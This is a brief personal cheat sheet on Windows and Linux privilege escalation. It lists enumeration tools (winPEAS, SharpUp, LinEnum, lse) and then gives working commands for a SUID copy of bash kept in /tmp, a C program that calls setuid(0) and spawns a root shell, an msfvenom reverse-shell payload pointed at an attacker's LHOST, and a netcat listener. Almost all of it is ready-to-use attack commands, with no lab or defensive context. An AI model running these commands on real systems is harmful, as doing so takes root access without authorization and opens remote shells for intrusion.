Privilege Escalation

Windows

./winPEASany.exe quite serviceinfo

./SharpUp.exe 

Linux

linEnum.sh --> https://github.com/rebootuser/LinEnum

lse.sh --> https://github.com/diego-treitos/linux-smart-enumeration

before run, set History Terminal to line = 5000

then just execute linEnum and review it carefully.

Spawning Root Shell

• rootbash -> SUID

cp /bin/bash /tmp/rootbash

chmod +s /tmp/rootbash

spawn the root shell

/tmp/rootbash -p

• Custom Executable

If some root process executes another process which you can control (modified or put your binary file)

int main() {
    setuid(0);
    system("/bin/bash -p");
}

compile using:

gcc -o <name> <file.c>

• msfvenom (reverse shell)

generate elf file using msfvenom

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf

listening on the attacking machine:

nc -lvnp <port>

• Native Reverse Shells

Use this tool to generate reverse shell in any language:

https://github.com/mthbernardes/rsg

Will be update soon